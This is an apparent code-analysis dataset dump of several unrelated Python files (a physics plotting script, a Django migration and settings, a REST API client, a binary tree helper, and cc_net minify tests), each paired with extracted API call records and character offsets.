(['"""N_BINS"""'], {'default': '_Nbins', 'vartype': 'int'}), "('N_BINS', default=_Nbins, vartype=int)\n", (12195, 12234), False, 'from active_particles.init import get_env, get_env_list\n'), ((12304, 12353), 'active_particles.init.get_env', 'get_env', (['"""PHIMAX"""'], {'default': '_phimax', 'vartype': 'float'}), "('PHIMAX', default=_phimax, vartype=float)\n", (12311, 12353), False, 'from active_particles.init import get_env, get_env_list\n'), ((12433, 12471), 'active_particles.init.get_env', 'get_env', (['"""BOX_SIZE_COR"""'], {'vartype': 'float'}), "('BOX_SIZE_COR', vartype=float)\n", (12440, 12471), False, 'from active_particles.init import get_env, get_env_list\n'), ((12716, 12782), 'active_particles.init.get_env', 'get_env', (['"""INITIAL_FRAME_COR"""'], {'default': '_init_frame_cor', 'vartype': 'int'}), "('INITIAL_FRAME_COR', default=_init_frame_cor, vartype=int)\n", (12723, 12782), False, 'from active_particles.init import get_env, get_env_list\n'), ((12887, 12953), 'active_particles.init.get_env', 'get_env', (['"""INTERVAL_MAXIMUM_COR"""'], {'default': '_int_max_cor', 'vartype': 'int'}), "('INTERVAL_MAXIMUM_COR', default=_int_max_cor, vartype=int)\n", (12894, 12953), False, 'from active_particles.init import get_env, get_env_list\n'), ((13083, 13139), 'active_particles.init.get_env', 'get_env', (['"""N_CASES_COR"""'], {'default': '_Ncases_cor', 'vartype': 'int'}), "('N_CASES_COR', default=_Ncases_cor, vartype=int)\n", (13090, 13139), False, 'from active_particles.init import get_env, get_env_list\n'), ((13236, 13283), 'active_particles.init.get_env', 'get_env', (['"""R_MIN"""'], {'default': '_r_min', 'vartype': 'float'}), "('R_MIN', default=_r_min, vartype=float)\n", (13243, 13283), False, 'from active_particles.init import get_env, get_env_list\n'), ((13342, 13389), 'active_particles.init.get_env', 'get_env', (['"""R_MAX"""'], {'default': '_r_max', 'vartype': 'float'}), "('R_MAX', default=_r_max, vartype=float)\n", (13349, 13389), False, 'from 
active_particles.init import get_env, get_env_list\n'), ((13958, 13971), 'active_particles.naming.VarN', 'naming.VarN', ([], {}), '()\n', (13969, 13971), True, 'import active_particles.naming as naming\n'), ((14033, 14047), 'active_particles.naming.AHB2D', 'naming.AHB2D', ([], {}), '()\n', (14045, 14047), True, 'import active_particles.naming as naming\n'), ((14142, 14197), 'active_particles.init.get_env', 'get_env', (['"""FONT_SIZE"""'], {'default': '_font_size', 'vartype': 'float'}), "('FONT_SIZE', default=_font_size, vartype=float)\n", (14149, 14197), False, 'from active_particles.init import get_env, get_env_list\n'), ((14237, 14294), 'active_particles.init.get_env', 'get_env', (['"""MARKER_SIZE"""'], {'default': '_marker_size', 'vartype': 'int'}), "('MARKER_SIZE', default=_marker_size, vartype=int)\n", (14244, 14294), False, 'from active_particles.init import get_env, get_env_list\n'), ((14318, 14396), 'matplotlib.rcParams.update', 'mpl.rcParams.update', (["{'font.size': font_size, 'lines.markersize': marker_size}"], {}), "({'font.size': font_size, 'lines.markersize': marker_size})\n", (14337, 14396), True, 'import matplotlib as mpl\n'), ((14422, 14447), 'active_particles.init.get_env_list', 'get_env_list', (['"""COLORMAPS"""'], {}), "('COLORMAPS')\n", (14434, 14447), False, 'from active_particles.init import get_env, get_env_list\n'), ((14733, 14794), 'active_particles.init.get_env', 'get_env', (['"""RATIO_LEGEND"""'], {'default': '_ratio_legend', 'vartype': 'float'}), "('RATIO_LEGEND', default=_ratio_legend, vartype=float)\n", (14740, 14794), False, 'from active_particles.init import get_env, get_env_list\n'), ((14860, 14909), 'active_particles.init.get_env', 'get_env', (['"""WSPACE"""'], {'default': '_wspace', 'vartype': 'float'}), "('WSPACE', default=_wspace, vartype=float)\n", (14867, 14909), False, 'from active_particles.init import get_env, get_env_list\n'), ((14944, 14993), 'active_particles.init.get_env', 'get_env', (['"""HSPACE"""'], {'default': 
'_hspace', 'vartype': 'float'}), "('HSPACE', default=_hspace, vartype=float)\n", (14951, 14993), False, 'from active_particles.init import get_env, get_env_list\n'), ((15031, 15067), 'active_particles.init.get_env', 'get_env', (['"""X_SCALE"""'], {'default': '_x_scale'}), "('X_SCALE', default=_x_scale)\n", (15038, 15067), False, 'from active_particles.init import get_env, get_env_list\n'), ((15109, 15149), 'active_particles.init.get_env', 'get_env', (['"""PHILOC_YS"""'], {'default': '_philoc_ys'}), "('PHILOC_YS', default=_philoc_ys)\n", (15116, 15149), False, 'from active_particles.init import get_env, get_env_list\n'), ((15204, 15238), 'active_particles.init.get_env', 'get_env', (['"""CHI_YS"""'], {'default': '_chi_ys'}), "('CHI_YS', default=_chi_ys)\n", (15211, 15238), False, 'from active_particles.init import get_env, get_env_list\n'), ((15295, 15327), 'active_particles.init.get_env', 'get_env', (['"""DT_YS"""'], {'default': '_dt_ys'}), "('DT_YS', default=_dt_ys)\n", (15302, 15327), False, 'from active_particles.init import get_env, get_env_list\n'), ((15400, 15442), 'active_particles.init.get_env', 'get_env', (['"""RATIOTL_YS"""'], {'default': '_ratioTL_ys'}), "('RATIOTL_YS', default=_ratioTL_ys)\n", (15407, 15442), False, 'from active_particles.init import get_env, get_env_list\n'), ((15528, 15571), 'active_particles.init.get_env', 'get_env', (['"""DRDT"""'], {'default': '(True)', 'vartype': 'bool'}), "('DRDT', default=True, vartype=bool)\n", (15535, 15571), False, 'from active_particles.init import get_env, get_env_list\n'), ((17882, 17894), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (17892, 17894), True, 'import matplotlib.pyplot as plt\n'), ((18466, 18568), 'matplotlib.gridspec.GridSpec', 'GridSpec', (['(4)', '(1 + comparisons)'], {'width_ratios': '([1] + comparisons * [1 / (comparisons * ratio_legend)])'}), '(4, 1 + comparisons, width_ratios=[1] + comparisons * [1 / (\n comparisons * ratio_legend)])\n', (18474, 18568), False, 'from 
matplotlib.gridspec import GridSpec\n'), ((18583, 18604), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs[0, 0]'], {}), '(gs[0, 0])\n', (18594, 18604), True, 'import matplotlib.pyplot as plt\n'), ((18733, 18754), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs[1, 0]'], {}), '(gs[1, 0])\n', (18744, 18754), True, 'import matplotlib.pyplot as plt\n'), ((18982, 19003), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs[2, 0]'], {}), '(gs[2, 0])\n', (18993, 19003), True, 'import matplotlib.pyplot as plt\n'), ((19111, 19132), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs[3, 0]'], {}), '(gs[3, 0])\n', (19122, 19132), True, 'import matplotlib.pyplot as plt\n'), ((22428, 22471), 'active_particles.init.get_env', 'get_env', (['"""SHOW"""'], {'default': '(True)', 'vartype': 'bool'}), "('SHOW', default=True, vartype=bool)\n", (22435, 22471), False, 'from active_particles.init import get_env, get_env_list\n'), ((10426, 10438), 'active_particles.naming.Cuu', 'naming.Cuu', ([], {}), '()\n', (10436, 10438), True, 'import active_particles.naming as naming\n'), ((12555, 12598), 'active_particles.init.get_env', 'get_env', (['"""X_ZERO"""'], {'default': '(0)', 'vartype': 'float'}), "('X_ZERO', default=0, vartype=float)\n", (12562, 12598), False, 'from active_particles.init import get_env, get_env_list\n'), ((12604, 12647), 'active_particles.init.get_env', 'get_env', (['"""Y_ZERO"""'], {'default': '(0)', 'vartype': 'float'}), "('Y_ZERO', default=0, vartype=float)\n", (12611, 12647), False, 'from active_particles.init import get_env, get_env_list\n'), ((19445, 19473), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs[:, 1 + traj]'], {}), '(gs[:, 1 + traj])\n', (19456, 19473), True, 'import matplotlib.pyplot as plt\n'), ((22364, 22406), 'active_particles.init.get_env', 'get_env', (['"""IMAGE_NAME"""'], {'default': '_image_name'}), "('IMAGE_NAME', default=_image_name)\n", (22371, 22406), False, 'from active_particles.init import get_env, get_env_list\n'), ((22473, 22483), 
'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (22481, 22483), True, 'import matplotlib.pyplot as plt\n'), ((10572, 10584), 'active_particles.naming.Cww', 'naming.Cww', ([], {}), '()\n', (10582, 10584), True, 'import active_particles.naming as naming\n'), ((16070, 16231), 'active_particles.plot.pphiloc.Philoc', 'Philoc', (['data_dir', 'naming_simdir', "{'density': phi, **vattribute, **attributes_philoc}", 'parameters_file', 'v', 'vmin', 'vmax'], {'excluded_dir': 'excluded_directories'}), "(data_dir, naming_simdir, {'density': phi, **vattribute, **\n attributes_philoc}, parameters_file, v, vmin, vmax, excluded_dir=\n excluded_directories)\n", (16076, 16231), False, 'from active_particles.plot.pphiloc import Philoc, _init_frame as _init_frame_philoc, _int_max as _int_max_philoc, _box_size as _box_size_philoc, _Ncases as _Ncases_philoc, _Nbins, _phimax\n'), ((16389, 16547), 'active_particles.plot.chi_msd.ChiMsd', 'ChiMsd', (['data_dir', 'naming_simdir', "{'density': phi, **vattribute, **attributes_cor}", 'parameters_file', 'v', 'vmin', 'vmax'], {'excluded_dir': 'excluded_directories'}), "(data_dir, naming_simdir, {'density': phi, **vattribute, **\n attributes_cor}, parameters_file, v, vmin, vmax, excluded_dir=\n excluded_directories)\n", (16395, 16547), False, 'from active_particles.plot.chi_msd import ChiMsd, _init_frame_cor, _int_max_cor, _Ncases_cor, _r_min, _r_max\n'), ((16768, 16924), 'active_particles.plot.corlcort.CLCT', 'CLCT', (['data_dir', 'naming_simdir', "{'density': phi, **vattribute, **attributes_cor}", 'parameters_file', 'v', 'vmin', 'vmax'], {'excluded_dir': 'excluded_directories'}), "(data_dir, naming_simdir, {'density': phi, **vattribute, **\n attributes_cor}, parameters_file, v, vmin, vmax, excluded_dir=\n excluded_directories)\n", (16772, 16924), False, 'from active_particles.plot.corlcort import CLCT\n'), ((21483, 21561), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'lw': '(0)', 'label': "('$\\\\phi=%1.2f, %s=%.1e$' % (phi, 
f_label, f_var))"}), "([0], [0], lw=0, label='$\\\\phi=%1.2f, %s=%.1e$' % (phi, f_label, f_var))\n", (21489, 21561), False, 'from matplotlib.lines import Line2D\n'), ((21591, 21613), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'lw': '(0)'}), '([0], [0], lw=0)\n', (21597, 21613), False, 'from matplotlib.lines import Line2D\n'), ((21627, 21723), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'linestyle': 'linestyle', 'color': '"""black"""', 'label': "('$%s = %.1e$' % (c_label, c_var))"}), "([0], [0], linestyle=linestyle, color='black', label='$%s = %.1e$' %\n (c_label, c_var))\n", (21633, 21723), False, 'from matplotlib.lines import Line2D\n'), ((21750, 21772), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'lw': '(0)'}), '([0], [0], lw=0)\n', (21756, 21772), False, 'from matplotlib.lines import Line2D\n'), ((22002, 22024), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'lw': '(0)'}), '([0], [0], lw=0)\n', (22008, 22024), False, 'from matplotlib.lines import Line2D\n'), ((10742, 10754), 'active_particles.naming.Cdd', 'naming.Cdd', ([], {}), '()\n', (10752, 10754), True, 'import active_particles.naming as naming\n'), ((10888, 10900), 'active_particles.naming.Cee', 'naming.Cee', ([], {}), '()\n', (10898, 10900), True, 'import active_particles.naming as naming\n'), ((21832, 21927), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'color': 'colors_traj[var_value]', 'label': "('$%s = %.1e$' % (c_label, var_value))"}), "([0], [0], color=colors_traj[var_value], label='$%s = %.1e$' % (\n c_label, var_value))\n", (21838, 21927), False, 'from matplotlib.lines import Line2D\n'), ((22084, 22191), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'lw': '(0)', 'color': '"""black"""', 'marker': 'markers_traj[time_step]', 'label': "('$dt = %.1e$' % time_step)"}), "([0], [0], lw=0, color='black', marker=markers_traj[time_step], label\n ='$dt = %.1e$' % time_step)\n", (22090, 22191), False, 'from matplotlib.lines import Line2D\n')] |
# Generated by Django 2.2.15 on 2021-01-29 22:55
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Reworks ``AuditionRounds.candidate``: the old field is dropped and then
    # re-added as a nullable ForeignKey to ``sitewebapp.Candidates`` with a
    # ``candidates`` reverse accessor. The operation order matters here
    # (RemoveField must run before AddField re-creates the column), so the
    # generated statements are left exactly as Django emitted them.
    dependencies = [
        ('sitewebapp', '0013_auto_20210130_0409'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='auditionrounds',
            name='candidate',
        ),
        migrations.AddField(
            model_name='auditionrounds',
            name='candidate',
            # null/blank allowed so existing rows survive the re-creation;
            # CASCADE deletes audition rounds when their candidate is removed.
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='candidates', to='sitewebapp.Candidates'),
        ),
    ]
| [
"django.db.migrations.RemoveField",
"django.db.models.ForeignKey"
] | [((272, 341), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""auditionrounds"""', 'name': '"""candidate"""'}), "(model_name='auditionrounds', name='candidate')\n", (294, 341), False, 'from django.db import migrations, models\n'), ((496, 641), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""candidates"""', 'to': '"""sitewebapp.Candidates"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, related_name='candidates', to='sitewebapp.Candidates')\n", (513, 641), False, 'from django.db import migrations, models\n')] |
import urllib.request
from urllib.parse import urlencode
from json import loads
from socket import timeout
from ssl import _create_unverified_context
from corsair import *
class Api(object):
    """Entry point to the REST API.

    Normalises the base URL, captures the credentials once, and exposes one
    :class:`Endpoint` attribute per top-level API family.
    """

    # Every API family exposed as an attribute; the attribute name and the
    # endpoint path segment are identical.
    _FAMILIES = (
        'analytics', 'ariel', 'asset_model', 'auth', 'config',
        'data_classification', 'forensics', 'gui_app_framework', 'help',
        'qrm', 'reference_data', 'scanner', 'services', 'siem',
        'staged_config', 'system',
    )

    def __init__(self, base_url, auth, tls_verify=True):
        # Strip a single trailing slash so URL joining stays predictable.
        self.base_url = base_url[:-1] if base_url[-1] == '/' else base_url
        self.auth = auth
        self.tls_verify = tls_verify
        # Credentials are frozen here; note the loop below rebinds
        # ``self.auth`` to an Endpoint (matching the original layout) while
        # the raw token survives inside this tuple.
        self.credentials = (self.base_url, self.auth, self.tls_verify)
        for family in self._FAMILIES:
            setattr(self, family, Endpoint(self.credentials, family))
class Endpoint(object):
    """One API family; knows how to create and read its resources."""

    def __init__(self, credentials, endpoint):
        base_url, auth, tls_verify = credentials
        self.base_url = base_url
        self.endpoint = endpoint
        self.resource = ''
        self.auth = auth
        self.tls_verify = tls_verify

    def create(self, _resource, **filters):
        """POST a new resource; return the decoded JSON body on HTTP 201."""
        self.resource = _resource
        target = make_url(self.base_url, self.endpoint, self.resource)
        response = Request(target, self.auth, self.tls_verify).post(**filters)
        if response.status != 201:
            raise CorsairError('Could not create requisition')
        return loads(response.read())

    def read(self, _resource, **filters):
        """GET a resource; return its results and the Content-Range header.

        Returns a dict ``{'results': <decoded JSON>, 'range': <str or None>}``.
        Raises CorsairError on a socket timeout or a non-200 status.
        """
        self.resource = _resource
        target = make_url(self.base_url, self.endpoint, self.resource)
        request = Request(target, self.auth, self.tls_verify)
        try:
            response = request.get(**filters)
        except timeout:
            raise CorsairError('Operation timedout')
        if response.status != 200:
            raise CorsairError('Not found')
        crange = None
        if 'Content-Range' in response.headers:
            # Header looks like "items a-b/total"; keep the "a-b/total" part.
            crange = response.headers['Content-Range'].split(' ')[1]
        return {'results': loads(response.read()), 'range': crange}
class Request(object):
    """Thin wrapper around ``urllib.request`` carrying the API headers.

    ``auth`` is sent in the ``SEC`` header; ``tls_verify=False`` disables
    certificate checking via an unverified SSL context. ``TIMEOUT`` comes
    from the ``corsair`` module star-import.
    """

    def __init__(self, url, auth, tls_verify):
        self.url = url
        self.timeout = TIMEOUT
        self.context = None if tls_verify else _create_unverified_context()
        self.headers = {
            'Accept': 'application/json',
            'Content-Type': 'application/json',
            'Version': '8.0',
            'SEC': auth
        }

    def _send(self, method, filters):
        """Build the query string and perform one HTTP request.

        Shared by :meth:`get` and :meth:`post` (previously duplicated).
        """
        url = f'{self.url}?{urlencode(filters)}' if filters else self.url
        req = urllib.request.Request(url, headers=self.headers, method=method)
        return urllib.request.urlopen(req, timeout=self.timeout, context=self.context)

    def get(self, **filters):
        """Issue a GET; a ``Range`` filter is promoted to a request header."""
        if 'Range' in filters:
            self.headers.update({'Range': filters.pop('Range')})
        return self._send('GET', filters)

    def post(self, **filters):
        """Issue a POST with the filters encoded as query parameters."""
        return self._send('POST', filters)
| [
"urllib.parse.urlencode",
"ssl._create_unverified_context"
] | [((2902, 2930), 'ssl._create_unverified_context', '_create_unverified_context', ([], {}), '()\n', (2928, 2930), False, 'from ssl import _create_unverified_context\n'), ((3298, 3316), 'urllib.parse.urlencode', 'urlencode', (['filters'], {}), '(filters)\n', (3307, 3316), False, 'from urllib.parse import urlencode\n'), ((3573, 3591), 'urllib.parse.urlencode', 'urlencode', (['filters'], {}), '(filters)\n', (3582, 3591), False, 'from urllib.parse import urlencode\n')] |
from queue import Queue
def convert_arr_to_binary_tree(arr):
    """
    Takes arr representing level-order traversal of Binary Tree
    """
    # Index of the next value to consume from the level-order array.
    index = 0
    length = len(arr)
    # NOTE(review): an empty tree is signalled by -1 at position 0, while
    # missing children below are signalled by None -- confirm that mixing
    # the two sentinels is intended by the array producer.
    if length <= 0 or arr[0] == -1:
        return None
    root = BinaryTreeNode(arr[index])  # BinaryTreeNode is defined elsewhere in this module
    index += 1
    queue = Queue()
    queue.put(root)
    # Breadth-first reconstruction: every dequeued node consumes exactly two
    # array entries (left child, then right child).
    # NOTE(review): arr must contain an entry for every child slot of every
    # non-None node, otherwise the arr[index] reads below raise IndexError --
    # confirm callers guarantee a complete level-order encoding.
    while not queue.empty():
        current_node = queue.get()
        left_child = arr[index]
        index += 1
        if left_child is not None:
            left_node = BinaryTreeNode(left_child)
            current_node.left = left_node
            queue.put(left_node)
        right_child = arr[index]
        index += 1
        if right_child is not None:
            right_node = BinaryTreeNode(right_child)
            current_node.right = right_node
            queue.put(right_node)
    return root
def path_from_root_to_node(root, data):
    """
    Return the root-to-node path for ``data`` as a list, or None if absent.

    Assuming data as input to find the node
    The solution can be easily changed to find a node instead of data
    :param data: value to search for in the tree
    :return: list of node values from the root down to ``data``, or None

    Bug fix: when ``data`` is not present, path_from_node_to_root returns
    None and the old ``list(reversed(None))`` raised TypeError; the
    "not found" case is now reported as None, matching the helper.
    """
    bottom_up = path_from_node_to_root(root, data)
    if bottom_up is None:
        return None
    return list(reversed(bottom_up))
def path_from_node_to_root(root, data):
    """Return the bottom-up path from the node holding ``data`` to the root.

    Produces a list starting at ``data`` and ending at the root's value,
    or None when ``data`` does not occur in the tree.
    """
    if root is None:
        return None
    if root.data == data:
        return [data]
    # Search both subtrees (left first, as before); the first hit wins and
    # the current node's value is appended on the way back up.
    for subtree in (root.left, root.right):
        partial = path_from_node_to_root(subtree, data)
        if partial is not None:
            partial.append(root.data)
            return partial
    return None
"queue.Queue"
] | [((306, 313), 'queue.Queue', 'Queue', ([], {}), '()\n', (311, 313), False, 'from queue import Queue\n')] |
import os
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))  # directory containing this settings file
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
    ('<NAME>', '<EMAIL>'),  # contact placeholders anonymised upstream
)
MANAGERS = ADMINS
# Development database: a SQLite file in the working directory.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': 'data.sqlite'
    }
}
# NOTE(review): '*' accepts any Host header -- fine for development only.
ALLOWED_HOSTS = ['*']
TIME_ZONE = 'Europe/Vienna'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Media/static roots are left empty here; STATIC_URL is the only one set.
MEDIA_ROOT = ''
MEDIA_URL = ''
STATIC_ROOT = ''
STATIC_URL = '/static/'
STATICFILES_DIRS = (
)
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    # Uncomment the next line for simple clickjacking protection:
    # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'djangodash2013.urls'
WSGI_APPLICATION = 'djangodash2013.wsgi.application'
# Bug fix: without the trailing comma the parentheses are mere grouping and
# TEMPLATE_DIRS ends up a plain string instead of the tuple Django expects.
TEMPLATE_DIRS = (
    os.path.join(PROJECT_DIR, 'templates'),
)
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.admin',
    'mocks',  # project-local app
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# Logging: mail unhandled-request errors to ADMINS when DEBUG is False.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
# Prefer a real secret from local_settings; fall back to a hard-coded
# development key when that module is absent.
try:
    from local_settings import SECRET_KEY
except ImportError:
    SECRET_KEY = 'this-is-not-empty'
| [
"os.path.abspath",
"os.path.join"
] | [((1455, 1493), 'os.path.join', 'os.path.join', (['PROJECT_DIR', '"""templates"""'], {}), "(PROJECT_DIR, 'templates')\n", (1467, 1493), False, 'import os\n'), ((41, 66), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (56, 66), False, 'import os\n')] |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import json
from pathlib import Path
import pytest
import cc_net
import cc_net.minify as minify
from cc_net import jsonql, process_wet_file
from cc_net.minify import (
HASH_SIZE,
decode_hashes,
encode_hashes,
encode_line_ids,
get_hashes,
)
def test_encode_decode():
    """Hashes survive an encode/decode round trip unchanged."""
    sentences = ["Hello world !", "Is everyone happy in here ?"]
    original = get_hashes(sentences)
    assert all(len(h) == HASH_SIZE for h in original)
    original_ints = [minify._b2i(h) for h in original]
    round_tripped = decode_hashes(encode_hashes(original))
    assert all(len(d) == HASH_SIZE for d in round_tripped)
    assert [minify._b2i(d) for d in round_tripped] == original_ints
    assert round_tripped == original
def test_minify():
    """Minifier keeps only encoded line_ids, language and perplexity."""
    document = {
        "raw_content": "Hello world !\nIs everyone happy in here ?",
        "language": "en",
        "perplexity": 120.0,
        "line_ids": [0, 4],
    }
    want = {"line_ids": "AAAEAA==", "language": "en", "perplexity": 120.0}
    assert minify.Minifier()(document) == want
@pytest.fixture
def http_from_disk(monkeypatch):
    """Serve the checked-in sample WET file instead of doing real HTTP."""
    sample = Path(__file__).parent / "data" / "sample.warc.txt"

    def fake_get(url: str, n_retry: int = 3) -> bytes:
        assert url == process_wet_file.WET_URL_ROOT + "/crawl-data/sample.warc.wet"
        return sample.read_bytes()

    monkeypatch.setattr(cc_net.jsonql, "request_get_content", fake_get)
def test_minify_and_fetch(http_from_disk, tmp_path: Path):
    """Round trip: minify a ccnet doc, then restore it from the CC segment."""
    full_quotes = """Don't part with your illusions. When they are gone you may still exist, but you have ceased to live.
Education: that which reveals to the wise, and conceals from the stupid, the vast limits of their knowledge.
Facts are stubborn things, but statistics are more pliable.
Fiction is obliged to stick to possibilities. Truth isn't."""
    # We don't need no education.
    chosen_quotes = "\n".join(
        l for l in full_quotes.splitlines() if "Education" not in l
    )
    # The raw CommonCrawl document as it appears in the sample WET file.
    cc_doc = {
        "url": "http://sample_english.com",
        "date_download": "2019-03-18T00:00:00Z",
        "digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
        "source_domain": "sample_english.com",
        "title": "Famous Mark Twain Quotes",
        "raw_content": full_quotes,
        "cc_segment": "crawl-data/sample.warc.wet",
        "nlines": 4,
        "length": 353,
    }
    # What the cc_net pipeline adds: kept lines 0, 2 and 3 (line 1 dropped).
    ccnet_metadata = {
        "language": "en",
        "language_score": 0.99,
        "perplexity": 151.5,
        "bucket": "head",
        "raw_content": chosen_quotes,
        "nlines": 3,
        "length": len(chosen_quotes),
        "original_nlines": 4,
        "original_length": 353,
        "line_ids": [0, 2, 3],
    }
    ccnet_doc = dict(cc_doc, **ccnet_metadata)
    mini = minify.Minifier()(ccnet_doc.copy())
    assert mini is not ccnet_doc
    # The minified doc must keep exactly these fields (line_ids encoded).
    important_fields = [
        "url",
        "digest",
        "cc_segment",
        "language",
        "language_score",
        "perplexity",
        "bucket",
        "line_ids",
    ]
    expected = {k: ccnet_doc[k] for k in important_fields}
    expected["line_ids"] = encode_line_ids(expected["line_ids"])  # type: ignore
    assert expected == mini
    with jsonql.open_write(tmp_path / "sample.json") as o:
        print(json.dumps(mini), file=o)
    fetcher = minify.MetadataFetcher(tmp_path)
    # line_ids is removed when unminifying
    ccnet_doc.pop("line_ids")
    assert ccnet_doc == fetcher(cc_doc)
def test_fetch(http_from_disk, tmp_path: Path):
    """MetadataFetcher restores two docs (one per language) from one segment."""
    mini_docs = [
        {
            "url": "http://sample_chinese.com",
            "digest": "sha1:Y4E6URVYGIAFNVRTPZ5S3J64RTZTP6HJ",
            "cc_segment": "crawl-data/sample.warc.wet",
            "line_ids": encode_line_ids([2]),
            "bucket": "not_that_great",
        },
        {
            "url": "http://sample_english.com",
            "digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
            "cc_segment": "crawl-data/sample.warc.wet",
            "line_ids": encode_line_ids([3]),
            "bucket": "top_notch",
        },
    ]
    with jsonql.open_write(tmp_path / "sample.json") as o:
        for mini in mini_docs:
            print(json.dumps(mini), file=o)
    fetcher = minify.MetadataFetcher(tmp_path)
    cc = process_wet_file.CCSegmentsReader(["crawl-data/sample.warc.wet"])
    docs = [d for d in fetcher.map(cc) if d is not None]
    # Both docs live in the same segment, so it must be downloaded only once.
    assert cc.retrieved_segments == 1
    # Note: documents are retrieved as they are ordered in the .warc.wet file
    assert [
        "Facts are stubborn things, but statistics are more pliable.",
        "事實是固執的東西,但統計數字卻比較柔和。",
    ] == [d["raw_content"] for d in docs]
    assert ["top_notch", "not_that_great"] == [d["bucket"] for d in docs]
| [
"cc_net.process_wet_file.CCSegmentsReader",
"cc_net.minify._b2i",
"pathlib.Path",
"cc_net.minify.encode_hashes",
"cc_net.minify.get_hashes",
"cc_net.jsonql.open_write",
"json.dumps",
"cc_net.minify.decode_hashes",
"cc_net.minify.Minifier",
"cc_net.minify.encode_line_ids",
"cc_net.minify.Metadata... | [((548, 569), 'cc_net.minify.get_hashes', 'get_hashes', (['sentences'], {}), '(sentences)\n', (558, 569), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((688, 709), 'cc_net.minify.encode_hashes', 'encode_hashes', (['hashes'], {}), '(hashes)\n', (701, 709), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((724, 746), 'cc_net.minify.decode_hashes', 'decode_hashes', (['encoded'], {}), '(encoded)\n', (737, 746), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((1207, 1224), 'cc_net.minify.Minifier', 'minify.Minifier', ([], {}), '()\n', (1222, 1224), True, 'import cc_net.minify as minify\n'), ((3366, 3403), 'cc_net.minify.encode_line_ids', 'encode_line_ids', (["expected['line_ids']"], {}), "(expected['line_ids'])\n", (3381, 3403), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((3562, 3594), 'cc_net.minify.MetadataFetcher', 'minify.MetadataFetcher', (['tmp_path'], {}), '(tmp_path)\n', (3584, 3594), True, 'import cc_net.minify as minify\n'), ((4474, 4506), 'cc_net.minify.MetadataFetcher', 'minify.MetadataFetcher', (['tmp_path'], {}), '(tmp_path)\n', (4496, 4506), True, 'import cc_net.minify as minify\n'), ((4516, 4581), 'cc_net.process_wet_file.CCSegmentsReader', 'process_wet_file.CCSegmentsReader', (["['crawl-data/sample.warc.wet']"], {}), "(['crawl-data/sample.warc.wet'])\n", (4549, 4581), False, 'from cc_net import jsonql, process_wet_file\n'), ((642, 656), 'cc_net.minify._b2i', 'minify._b2i', (['h'], {}), '(h)\n', (653, 656), True, 'import cc_net.minify as minify\n'), ((822, 836), 'cc_net.minify._b2i', 'minify._b2i', (['d'], {}), '(d)\n', (833, 836), True, 'import cc_net.minify as minify\n'), ((3018, 3035), 'cc_net.minify.Minifier', 'minify.Minifier', ([], {}), '()\n', (3033, 3035), True, 'import 
